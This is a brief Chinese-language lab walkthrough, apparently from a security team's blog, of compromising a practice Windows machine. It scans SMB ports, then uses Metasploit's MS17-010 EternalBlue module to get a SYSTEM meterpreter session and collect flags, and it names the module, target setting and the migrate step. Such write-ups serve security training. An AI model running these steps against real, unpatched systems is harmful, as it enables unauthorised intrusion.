阅读须知:
探索者安全团队技术文章仅供参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用本公众号所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者
本人负责,作者不为此承担任何责任,如有侵权烦请告知,我们会立即删除并致歉,创作不易转载请标明出处.感谢!
师傅: K1t0 https://k1t0111.github.io
信息收集
今天来打一打简单靶场 ……
循例 对机器进行扫描 鉴于很简单 直接快点带过
直接扫描tcp
开放 445 和 135 139 端口 直接一看 445 就可能使永恒之蓝 并且给出很可能就是win7 -win10
不说别的 最好的 直接上 msf 直接先看一遍 是不是永恒之蓝
exploit
话不多说 msfconsole
直接搜一下 search ms17-010 看到出现四个模块 路径
直接用 use exploit/windows/smb/ms17_010_eternalblue
设置一下 set rhost 10.10.225.254
废话不多说直接上图
先check 看看究竟是不是这个漏洞
结果正确易受攻击
直接run 开打获取meterpreter
successful !!!
PS: 其实这个靶场中还涉及了 可以将shell 转化成 meterpreter
shell_to_meterpreter
同时可以用ps 命令查看进程 可以将我们的meterpreter移交到另一个进程中通过migrate
post
其实已经打完了
已经是system 没什么好说的 直接在根目录找到 flag1.txt
其他的flag 分别在 用户等常规地方找吧…..
总结
基础……….